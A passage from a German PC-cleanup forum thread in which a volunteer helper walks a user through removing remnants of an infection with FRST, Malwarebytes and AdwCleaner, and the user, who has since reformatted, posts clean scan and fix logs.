Description: Der Dienst "Synchronisierungshost_3f1b8" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/15/2016 01:27:56 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058

Error: (04/15/2016 01:27:34 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_3de1f" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/15/2016 12:51:23 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Display Driver Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/15/2016 12:24:56 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058

Error: (04/15/2016 12:24:41 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "StateRepository-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/15/2016 12:24:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_42d31" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/15/2016 12:24:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "ProductAgentService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/15/2016 12:24:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (04/15/2016 12:24:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel® ME Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.


CodeIntegrity:
===================================
  Date: 2016-04-14 19:07:12.478
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-04-14 18:51:09.806
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.798
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.789
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.776
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.768
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.759
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.631
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.561
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-14 18:51:09.499
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 45%
Installierter physikalischer RAM: 8143.18 MB
Verfügbarer physikalischer RAM: 4446.89 MB
Summe virtueller Speicher: 16335.18 MB
Verfügbarer virtueller Speicher: 11826.05 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.88 GB) (Free:102.83 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive e: (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive f: (Volume) (Fixed) (Total:465.66 GB) (Free:396.18 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: DAB05CD6)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 237E739B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

burningice 17.04.2016 23:37
:hallo:
Mein Name ist Rafael und ich werde dir bei der Bereinigung helfen.

Damit ich dir optimal helfen kann, halte dich bitte an folgende Regeln:
  • Bitte lies meine Posts komplett durch bevor du sie abarbeitest
  • Wenn ein Problem auftauchen sollte oder dir etwas unklar ist, unterbreche deine Arbeit und beschreibe es so genau wie möglich.
  • Bitte kein Crossposting
  • Installiere oder Deinstalliere keine Software ohne Aufforderung
  • Bitte verwende nur die Tools, welche hier im Thread erwähnt werden und führe sie nur gemäß Anweisung aus
  • Bitte antworte innerhalb von 24h um eine sinnvolle Bereinigung zu ermöglichen
  • Poste die Logs immer in CODE-Tags (#-Button), zur Not die Logs einfach aufteilen
  • Wichtig: Nur weil dein Problem mit einem Schritt plötzlich behoben ist, bedeutet das nicht, dass dein PC auch sauber ist. Mache solange weiter, bis ich dir sage, dass dein PC "clean" ist
  • Wenn ich dir nicht binnen 36h antworte, sende mir bitte eine persönliche Nachricht!
Los geht's :abklatsch:

Du hast in der Tat Reste einer Infektion.

Schritt: 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
Task: {12A2BC37-7206-40BC-9B42-09FA40FBDE95} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG

Task: {3DC3A735-665B-4794-9169-1C4858FDF25A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG

Task: {4B5C09EF-730D-4A96-84AE-9ADB8348BA6A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG

Task: {5166A363-7931-48FC-BC9E-E5D8C6716917} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG

Task: {58A159A5-577F-4F8B-AE47-3447DA6600CA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG

Task: {704B985E-C32C-49CF-B135-91610C9F90F4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG

Task: {831ECD9B-3BB3-4DCA-9D77-6CC9E0205CF8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG

Task: {8AE7B3F8-AF0A-4D61-AEE9-EC955673A7F1} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG

Task: {962145CB-7B34-403B-8D20-4F44A1ACE044} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

Task: {9E28BD01-6532-440F-B473-B2B0E793A7CE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG

Task: {FA8B6B6B-08BB-4111-BF4B-ED063CD35F62} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {36C91B3B-3E29-4046-BFB9-C0E90DF75AEA} - System32\Tasks\{780D0947-7D0E-0C0E-0A11-050B090A1104} => powe
HKLM-x32\...\Run: [] => [X]
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.



Schritt: 2
http://filepony.de/icon/tiny/malware...ti_malware.png Starte bitte wieder Malwarebytes Anti-Malware
  • Klicke auf das Dashboard und klicke unter dem Punkt Datenbankversion auf "Jetzt aktualisieren"
  • Wechsle zum Reiter Scannen und wähle den Bedrohungssuchlauf aus und klicke im Anschluss auf Suchlauf starten
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Suchlaufprotokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt: 3
Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).


Schritt: 4
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Bitte poste in deiner nächsten Antwort also:
  • Logfile von AdwCleaner
  • Logfile von Malwarebytes
  • Fixlog.txt
  • Frst.txt
  • Addition.txt

Jerichoholic 18.04.2016 15:27
Danke für die Antwort!
Mittlerweile habe ich allerdings formatiert, da mir das zu mulmig war. Falls das das Problem aber nicht behoben hat zur Sicherheit hier trotzdem die gewünschte Logs.

Code:
# AdwCleaner v5.112 - Bericht erstellt am 18/04/2016 um 11:45:16
# Aktualisiert am 17/04/2016 von Xplode
# Datenbank : 2016-04-17.1 [Server]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Marcel - MARCEL
# Gestartet von : C:\Users\Marcel\Downloads\adwcleaner_5.112.exe
# Option : Suchlauf
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****


***** [ Ordner ] *****


***** [ Dateien ] *****


***** [ DLL ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****


***** [ Registrierungsdatenbank ] *****


***** [ Internetbrowser ] *****


*************************

C:\AdwCleaner\AdwCleaner[S1].txt - [650 Bytes] - [18/04/2016 11:45:16]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [722 Bytes] ##########
Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 18.04.2016
Suchlaufzeit: 11:37
Protokolldatei: mbam.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.04.18.02
Rootkit-Datenbank: v2016.04.17.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Marcel

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 328589
Abgelaufene Zeit: 2 Min., 46 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Dateien: 0
(keine bösartigen Elemente erkannt)

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:17-04-2016 01
durchgeführt von Marcel (2016-04-18 11:34:34) Run:1
Gestartet von C:\Users\Marcel\Desktop
Geladene Profile: Marcel (Verfügbare Profile: Marcel)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Task: {12A2BC37-7206-40BC-9B42-09FA40FBDE95} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG

Task: {3DC3A735-665B-4794-9169-1C4858FDF25A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG

Task: {4B5C09EF-730D-4A96-84AE-9ADB8348BA6A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG

Task: {5166A363-7931-48FC-BC9E-E5D8C6716917} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG

Task: {58A159A5-577F-4F8B-AE47-3447DA6600CA} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG

Task: {704B985E-C32C-49CF-B135-91610C9F90F4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG

Task: {831ECD9B-3BB3-4DCA-9D77-6CC9E0205CF8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG

Task: {8AE7B3F8-AF0A-4D61-AEE9-EC955673A7F1} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG

Task: {962145CB-7B34-403B-8D20-4F44A1ACE044} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

Task: {9E28BD01-6532-440F-B473-B2B0E793A7CE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG

Task: {FA8B6B6B-08BB-4111-BF4B-ED063CD35F62} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {36C91B3B-3E29-4046-BFB9-C0E90DF75AEA} - System32\Tasks\{780D0947-7D0E-0C0E-0A11-050B090A1104} => powe
HKLM-x32\...\Run: [] => [X]
emptytemp:
*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12A2BC37-7206-40BC-9B42-09FA40FBDE95} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3DC3A735-665B-4794-9169-1C4858FDF25A} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4B5C09EF-730D-4A96-84AE-9ADB8348BA6A} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5166A363-7931-48FC-BC9E-E5D8C6716917} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58A159A5-577F-4F8B-AE47-3447DA6600CA} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{704B985E-C32C-49CF-B135-91610C9F90F4} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{831ECD9B-3BB3-4DCA-9D77-6CC9E0205CF8} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8AE7B3F8-AF0A-4D61-AEE9-EC955673A7F1} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{962145CB-7B34-403B-8D20-4F44A1ACE044} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9E28BD01-6532-440F-B473-B2B0E793A7CE} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA8B6B6B-08BB-4111-BF4B-ED063CD35F62} => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{36C91B3B-3E29-4046-BFB9-C0E90DF75AEA} => Schlüssel nicht gefunden.
C:\Windows\System32\Tasks\{780D0947-7D0E-0C0E-0A11-050B090A1104} => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{780D0947-7D0E-0C0E-0A11-050B090A1104} => Schlüssel nicht gefunden.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wert erfolgreich entfernt
EmptyTemp: => 673 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 11:34:51 ====
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:17-04-2016 01
durchgeführt von Marcel (Administrator) auf MARCEL (18-04-2016 11:46:13)
Gestartet von C:\Users\Marcel\Desktop
Geladene Profile: Marcel (Verfügbare Profile: Marcel)
Platform: Windows 10 Pro Version 1511 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10586.168_none_76587b40265ca57e\TiWorker.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397752 2016-04-05] (NVIDIA Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7390608 2016-04-15] (AVAST Software)
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [594240 2016-01-13] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
HKU\S-1-5-21-922123714-3683550124-3627477911-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50670720 2016-03-01] (Skype Technologies S.A.)
HKU\S-1-5-21-922123714-3683550124-3627477911-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-04-15] (AVAST Software)

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 192.168.2.1
Tcpip\..\Interfaces\{0cc2d4cf-73b8-4a18-b2df-61d02e1477c8}: [DhcpNameServer] 192.168.2.1 192.168.2.1

Internet Explorer:
==================
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-04-15] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-04-15] (Oracle Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\rujn2lxo.default
FF Homepage: about:newtab
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-04-15] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-04-15] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-04-15] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-04-15] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-22] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-22] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-02-26] (Adobe Systems Inc.)
FF Extension: Adblock Plus - C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Profiles\rujn2lxo.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-15]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-04-15]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [243296 2016-04-15] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [5570272 2016-04-15] (Avast Software)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1164856 2016-04-05] (NVIDIA Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1881144 2016-04-05] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-04-05] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-04-05] (NVIDIA Corporation)
